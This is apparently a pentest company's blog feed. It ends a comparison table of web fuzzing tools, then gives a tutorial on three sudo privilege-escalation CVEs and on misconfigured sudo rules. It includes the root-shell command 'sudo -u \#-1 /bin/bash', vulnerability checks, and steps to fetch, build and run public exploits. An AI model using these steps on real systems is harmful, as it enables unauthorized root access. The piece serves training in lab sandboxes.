Custom Method | No | No | Yes (-m) | Yes (-x) | Yes (-m) | Yes (-X) | Yes (-X) | No | Yes (-X) | No |
URL fuzzing (at any point) | No | Yes | Not by design but can be bypassed using --suffixes | Yes | No | Yes | Yes (fuzz mode) | No | Yes (fuzz mode) | N/A |
Post data fuzzing | No | No | No | Yes (-d) | No | Yes (-d) | Yes (fuzz mode) | No | Yes (fuzz mode) | N/A |
Header fuzzing | No | No | No | Yes (-H) | No | Yes | Yes (fuzz mode) | No | Yes (fuzz mode) | N/A |
Method fuzzing | No | No | No | Yes (-X FUZZ) | No | Yes (-X FUZZ) | Yes (fuzz mode) | No | Yes (fuzz mode) | N/A |
Raw file ingest | No | No | Yes (--raw) | Yes (-request) | No | No | No | No | Yes (--template-file) | No |
Follow redirect (302) | Yes + switch (-N) | Yes + switch | Yes (-F) | Yes (-r) | Yes (-r) | Yes (-L) | No | No | Yes (--follow-redirect) | No |
Custom filters | No | No | Yes (--excludes-*, based on text, size, regex) | Yes (-m*, -f*, based on code, size, regex) | Limited (status code, -s/-b) | Yes (based on code, words, regex) | Yes (based on code, string) | No | Yes (size,code,regex) | Yes (code, size or both) |
Backup files option | No | No | No | No | Yes (-d) | No | No | No | No | Yes |
Replay proxy | No | No | Yes (--replay-proxy) | Yes (-replay-proxy) | No | No | No | No | No | No |
Ignore certificate errors | By default ? | By default ? | By default | By default, (switch with -k) | Yes (-k) | By default | Yes (-k) | Yes (-s) | Yes (-k) | By default |
Specify IP to connect to | No | No | Yes (--ip) | No | No | Yes (--ip) | No | No | No | No |
Vhost enumeration | No | No | No | Yes | Yes | Yes | Yes | No | Yes | N/A |
Subdomain enumeration | No | No | No | Yes | Yes | Yes | Yes | Yes | Yes | N/A |
S3 enumeration | No | No | No | No | Yes | No | No | No | No | N/A |
This piece was written by Alex GARRIDO a.k.a. zeecka.Alex is a pentester at SEC-IT.
Website: zeecka.fr
]]>An introduction to 3 sudo vulnerabilities: CVE-2019-14287, CVE-2019-18634, CVE-2021-3156.
Here are the few vulnerabilities we will cover:
Vulnerability | Version | Prerequisite | Type |
---|---|---|---|
CVE-2019-14287 | < 1.8.28 | Requires permission to execute a command as another user | integer overflow, security bypass |
CVE-2019-18634 | < 1.8.26 | Requires pwfeedback option enabled | stack-based BoF |
CVE-2021-3156 (Baron Samedit) | < 1.9.5p2 | None | heap-based BoF |
CVE-2019-14287 exploits an integer overflow in the user ID variable.
an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u #$((0xffffffff))" command.
For example, if we have the following configuration in /etc/sudoers
, usersecit
should be able to run any command as any user except root
.
1 | secit ALL=(ALL:!root) NOPASSWD: ALL |
The user should see this:
1 | $ sudo -ll |
root
has the id zero.
In pseudo-code, it can be translated to:
1 | unless userid == 0 |
The well known syntax to run a command as another user is (with an example):
1 | $ sudo -u <user> <cmd> |
But it's also possible to provide the user id instead of the username:
1 | $ sudo -u#<id> <cmd> |
But the user id -1
(signed int) would cause an integer overflow and betranslated as 4294967295
(0xffffffff
) so the pseudo-chek userid == 0
wouldbe bypassed as we could have 4294967295 != 0
.
Exploiting the vulnerability is as easy as one of the following example:
1 | $ sudo -u \#-1 /bin/bash |
TryHackMe is hosting a vulnerable environment so it's possible to try thisvulnerability in a sandbox.
CVE-2019-18634 exploits a stack-based buffer overflow in the functiongetln()
from the file tgetpass.c
.But this vulnerability works only if the pwfeedback
option is enabled in/etc/sudoers
which is not the default for upstream and most packages frommainly used linux distros. However, in 2019, Linux Mint and elementary OSwere using pwfeedback
by default. pwfeedback
is a display feature toshow an asterisk when an user writes a character of its password.So even at the time the vulnerability was found, it was not likely that asystem would be vulnerable to it.
Here are some commands to check if sudo is vulnerable (you should get a segmentationfault):
1 | $ ruby -e 'puts ("A"*100 + "\x00")*50' | sudo -S id |
To exploit the vulnerability we can use a Proof of Concept (PoC) from Saleem Rashidhosted on the following git repository:saleemrashid/sudo-cve-2019-18634.
Details of the steps of exploit can be found in the comment ofexploit.c.
An easy scenario could be:
wget
gcc -o exploit exploit.c
./exploit
The output should be as follows:
1 | $ ./exploit |
TryHackMe is hosting a vulnerable environment so it's possible to try thisvulnerability in a sandbox.
CVE-2021-3156 (a.k.a. Baron Samedit) exploits a heap-based buffer overflow.This one is way more powerful than the two previous vulnerabilities we sawearlier because it works with the default configuration and with all versionsof sudo.
Here are some commands to check if sudo is vulnerable (you should get an errormalloc(): memory corruption
):
1 | $ sudoedit -s '\' $(ruby -e 'puts "A"*1000') |
To exploit the vulnerability we can use a Proof of Concept (PoC) from blastyhosted on the following git repository:blasty/CVE-2021-3156.
An easy scenario could be:
wget
make
./sudo-hax-me-a-sandwich
The output should be as follows:
1 | $ ./sudo-hax-me-a-sandwich 0 |
TryHackMe is hosting a vulnerable environment so it's possible to try thisvulnerability in a sandbox.
Even if sudo
is fully up to date and patched, a misconfiguration can opena door for the attacker.
The following config gives user secit the permission to execute ssh
asanybody including root.
1 | secit ALL=(ALL) /usr/bin/ssh |
A lot of legitimate linux binaries can abused to bypass local security,break out restricted shells, escalate elevated privileges orfacilitate other post-exploitation tasks.
So if root permission is given via sudo to use one of this binaries, it'svery likely that an attacker could get root permission easily.
A list of those binaries can be found on GTFObins website or browsedoffline using a CLI tool like GTFOBLookup.
An example of ssh
abuse:
1 | $ gtfoblookup linux sudo ssh |
There is also a Metasploit module called post/multi/recon/sudo_commands
doingthe following:
This module examines the sudoers configuration for the session userand lists the commands executable via sudo. This module alsoinspects each command and reports potential avenues for privilegedcode execution due to poor file system permissions or permittingexecution of executables known to be useful for privesc, such asutilities designed for file read/write, user modification, orexecution of arbitrary operating system commands. Note, you may needto provide the password for the session user
There are great virtual environments to train exploiting those binaries andmisconfigured sudo:
Privilege Escalation
section from Linux Agency room on TryHackMeThis piece was written by Alexandre ZANNI aka noraj.Alexandre is a pentester and a BlackArch maintainer.
Website: pwn.by/noraj
]]>